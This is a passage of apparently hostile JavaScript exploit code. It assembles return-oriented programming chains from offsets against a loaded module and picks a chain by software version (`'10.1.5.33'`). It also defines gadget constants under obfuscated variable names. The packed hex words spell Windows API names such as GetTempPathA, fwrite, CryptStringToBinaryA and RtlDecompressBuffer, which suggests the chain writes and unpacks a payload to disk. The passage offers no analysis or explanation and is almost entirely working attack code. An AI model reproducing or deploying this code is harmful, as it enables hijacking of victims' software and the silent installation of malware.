r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b04e\);r+=ue\(t+0x468ec0\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);\n        r+=ue\(0xcccc0438\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x468ec0\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc042c\);r+=ue\(t+0x42259f\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);\n        r+=ue\(t+0x81b02d\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0418\);\n        r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8d90\);r+=ue\(0x41414141\);\n        r+=ue\(t+0x81b033\);r+=ue\(t+0x1576\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x81b066\);r+=ue\(0x43434343\);\n        r+=ue\(t+0x81b052\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x81aa0e\);\n        r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc047c\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);\n        r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8d90\);r+=ue\(0x41414141\);r+=ue\(t+0x81b00e\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x42259f\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x60d4fc\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f41d4\);r+=ue\(t+0x4d8d90\);r+=ue\(0x41414141\);r+=ue\(t+0x81b001\);r+=ue\(t+0x1576\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);r+=ue\(t+0x81b101\);r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b101\);\n        r+=ue\(t+0x4f45b3\);r+=ue\(t+0x5f2fe9\);r+=ue\(0x542e44\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x504f35\);r+=ue\(t+0x505b0e\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc05f8\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);\n        r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b052\);r+=ue\(t+0x468ec0\);\n        r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc05fc\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4660\);r+=ue\(t+0x1dfe5\);r+=ue\(t+0x5ef654\);r+=ue\(t+0x81b101\);r+=ue\(t+0x81b015\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0600\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc0614\);r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);\n        r+=ue\(t+0x4705ba\);\n        r+=ue\(t+0x5f2fe9\);r+=ue\(t+0x81b05e\);r+=ue\(t+0x468ec0\);r+=ue\(t+0x53bba7\);r+=ue\(t+0x5ef6e4\);r+=ue\(0xcccc05f4\);\n        r+=ue\(t+0x42259f\);r+=ue\(t+0x17\);r+=ue\(t+0x13c4c3\);r+=ue\(t+0x2610d7\);r+=ue\(t+0x4705ba\);r+=ue\(0x42424242\);r+=ue\(t+0x504172\);r+=ue\(0x43434343\);r+=ue\(0x44444444\);r+=ue\(0x44444444\);r+=ue\(0x45454545\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f466c\);r+=ue\(t+0x1dfe5\);r+=ue\(t+0x4ffed4\);r+=ue\(0x45454545\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f4214\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x81b101\);r+=ue\(t+0x4ffed4\);r+=ue\(t+0x5f40c0\);r+=ue\(t+0x4d8d90\);r+=ue\(t+0x17\);\n        r+=ue\(0x1010101\);r+=ue\(0x6f004d\);\n        r+=ue\(0x750064\);\n        r+=ue\(0x65006c\); ROP_ADD_ESP_4 = 0x20c7391b;\n        bENEDETTO = 0x20d7fb6d;\n        cARPONE = 0x20d05172;\n        sENTIRSI = 0x20cfd4fe;\n        rICINGHE = 0x20cef29c;\n        aPPARENZA = 0x2080df68;\n        fISAMENTE = 0x20d034fa;\n        pRESUNSI = 0x20801017;\n        oRDERED = 0x20ced88f;\n        cOCOLLE = 0x20892085;\n    } else if\(pRENDENDO == '10.1.5.33'\){\n        var r="";\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x17\);r+=ue\(t+0x41f649\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f001\);\n        r+=ue\(t+0x5f6569\);r+=ue\(0x54746547\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f005\);r+=ue\(t+0x5f6569\);r+=ue\(0x50706d65\);\n        r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f009\);r+=ue\(t+0x5f6569\);r+=ue\(0x41687461\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f00d\);r+=ue\(t+0x5f6569\);r+=ue\(0x41414100\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f00e\);\n        r+=ue\(t+0x5f6569\);r+=ue\(0x69727766\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f012\);r+=ue\(t+0x5f6569\);r+=ue\(0x41006574\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f015\);r+=ue\(t+0x5f6569\);r+=ue\(0x41006277\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f018\);r+=ue\(t+0x5f6569\);r+=ue\(0x70797243\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);\n        r+=ue\(t+0x81f01c\);r+=ue\(t+0x5f6569\);r+=ue\(0x72745374\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f020\);r+=ue\(t+0x5f6569\);r+=ue\(0x54676e69\);r+=ue\(t+0x470e6a\);\n        r+=ue\(t+0x577206\);r+=ue\(t+0x81f024\);r+=ue\(t+0x5f6569\);r+=ue\(0x6e69426f\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f028\);r+=ue\(t+0x5f6569\);r+=ue\(0x41797261\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f02c\);r+=ue\(t+0x5f6569\);r+=ue\(0x41414100\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f02d\);r+=ue\(t+0x5f6569\);\n        r+=ue\(0x6c64746e\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f031\);r+=ue\(t+0x5f6569\);r+=ue\(0x4141006c\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f033\);r+=ue\(t+0x5f6569\);r+=ue\(0x446c7452\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f037\);r+=ue\(t+0x5f6569\);r+=ue\(0x6d6f6365\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f03b\);r+=ue\(t+0x5f6569\);\n        r+=ue\(0x73657270\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f03f\);r+=ue\(t+0x5f6569\);r+=ue\(0x66754273\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f043\);r+=ue\(t+0x5f6569\);r+=ue\(0x726566\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f047\);r+=ue\(t+0x5f6569\);r+=ue\(0x73736377\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f04b\);r+=ue\(t+0x5f6569\);r+=ue\(0x41007274\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0240\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x56376e\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc023c\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f7214\);r+=ue\(t+0x4b536e\);r+=ue\(t+0x81e3fa\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc022c\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f71d4\);r+=ue\(t+0x4b536e\);r+=ue\(0x41414141\);r+=ue\(t+0x81f047\);r+=ue\(t+0x16c4\);r+=ue\(t+0x5f2bc6\);r+=ue\(0x41414141\);r+=ue\(t+0x611230\);r+=ue\(t+0x2e2825\);r+=ue\(t+0x5f3bb9\);\n        r+=ue\(t+0x577206\);r+=ue\(t+0x81f05e\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x577206\);r+=ue\(t+0x81f04e\);r+=ue\(t+0x5f6569\);r+=ue\(0x1010101\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f7214\);\n        r+=ue\(t+0x4b536e\);r+=ue\(t+0x81e594\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc02ac\);\n        r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);\n        r+=ue\(t+0x577206\);\n        r+=ue\(t+0x5f71d4\);r+=ue\(t+0x4b536e\);r+=ue\(0x41414141\);r+=ue\(t+0x81f018\);r+=ue\(t+0x5171c9\);r+=ue\(t+0x5f6569\);r+=ue\(t+0x81f05e\);r+=ue\(t+0x472590\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc033c\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x505c7e\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0340\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x505c7e\);r+=ue\(t+0x5e746b\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0344\);r+=ue\(t+0x422631\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5171c9\);r+=ue\(t+0x16c4\);r+=ue\(t+0x17\);\n        r+=ue\(0x41414141\);r+=ue\(0x42424242\);r+=ue\(0x43434343\);\n        r+=ue\(t+0x81f066\);r+=ue\(t+0x81f04e\);\n        r+=ue\(t+0x81f056\);r+=ue\(t+0x81f05a\);r+=ue\(t+0x505c7e\);r+=ue\(t+0x5e746b\);r+=ue\(t+0x5e746b\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0428\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f6569\);r+=ue\(t+0x81f04e\);r+=ue\(t+0x472590\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0438\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f6569\);r+=ue\(t+0x81f05e\);r+=ue\(t+0x472590\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc042c\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f7214\);\n        r+=ue\(t+0x4b536e\);r+=ue\(t+0x81f02d\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0418\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f71d4\);r+=ue\(t+0x4b536e\);r+=ue\(0x41414141\);r+=ue\(t+0x81f033\);r+=ue\(t+0x16c4\);r+=ue\(t+0x17\);r+=ue\(0x41414141\);r+=ue\(0x44444444\);r+=ue\(0x1010101\);r+=ue\(t+0x81f066\);r+=ue\(0x43434343\);r+=ue\(t+0x81f052\);\n        r+=ue\(t+0x577206\);r+=ue\(t+0x5f7214\);r+=ue\(t+0x4b536e\);r+=ue\(t+0x81e3fa\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc047c\);\n        r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f71d4\);r+=ue\(t+0x4b536e\);r+=ue\(0x41414141\);r+=ue\(t+0x81f00e\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc05ec\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);\n        r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f7214\);r+=ue\(t+0x4b536e\);r+=ue\(t+0x610d9c\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc04e0\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f71d4\);r+=ue\(t+0x4b536e\);\n        r+=ue\(0x41414141\);r+=ue\(t+0x81f001\);r+=ue\(t+0x16c4\);r+=ue\(t+0x17\);r+=ue\(0x1010101\);\n        r+=ue\(t+0x81f101\);r+=ue\(t+0x5f6569\);\n        r+=ue\(t+0x81f101\);r+=ue\(t+0x4f52f5\);r+=ue\(t+0x5f6569\);r+=ue\(0x542e44\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x505c7e\);r+=ue\(t+0x5e746b\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);\n        r+=ue\(0xcccc05f8\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f6569\);\n        r+=ue\(t+0x81f052\);r+=ue\(t+0x472590\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);\n        r+=ue\(0xcccc05fc\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x577206\);r+=ue\(t+0x5f7664\);r+=ue\(t+0x1e0b9\);\n        r+=ue\(t+0x5f2bc6\);r+=ue\(t+0x81f101\);r+=ue\(t+0x81f015\);r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0600\);r+=ue\(t+0x422631\);r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f3bb9\);\n        r+=ue\(t+0x5f3bb9\);r+=ue\(t+0x5f2c69\);r+=ue\(0xcccc0614\);r+=ue\(t+0x422631\);\n        r+=ue\(t+0x17\);r+=ue\(t+0x13c94e\);r+=ue\(t+0x261b68\);r+=ue\(t+0x470e6a\);r+=ue\(t+0x5f6569\);r+=